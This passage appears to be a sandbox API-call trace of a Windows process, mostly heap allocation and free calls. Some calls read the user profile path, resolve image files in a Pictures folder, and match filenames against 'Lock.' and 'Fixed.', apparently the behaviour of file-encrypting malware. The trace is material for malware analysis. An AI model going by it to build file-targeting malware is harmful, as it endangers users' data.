hHeap=0x2af0000) returned 1 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb3c8 [0210.049] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/F3GpsjDs7t.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\F3GpsjDs7t.png", lpFilePart=0x8cf650*="F3GpsjDs7t.png") returned 0x27 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb3c8 | out: hHeap=0x2af0000) returned 1 [0210.049] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F3GpsjDs7t.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f3gpsjds7t.png")) returned 0xffffffff [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.050] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.050] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.050] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FS3WVwrvnLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S3WVwrvnLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3WVwrvnLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WVwrvnLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VwrvnLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrvnLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rvnLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vnLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nLekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ekT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kT9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.051] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a69a00 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FS3WVwrvnLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S3WVwrvnLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3WVwrvnLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WVwrvnLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VwrvnLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrvnLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rvnLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vnLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nLekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ekT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kT9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T9.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6568 [0210.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6568 | out: hHeap=0x2af0000) returned 1 [0210.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.053] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.053] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.054] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.054] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.055] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0210.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.056] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0210.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 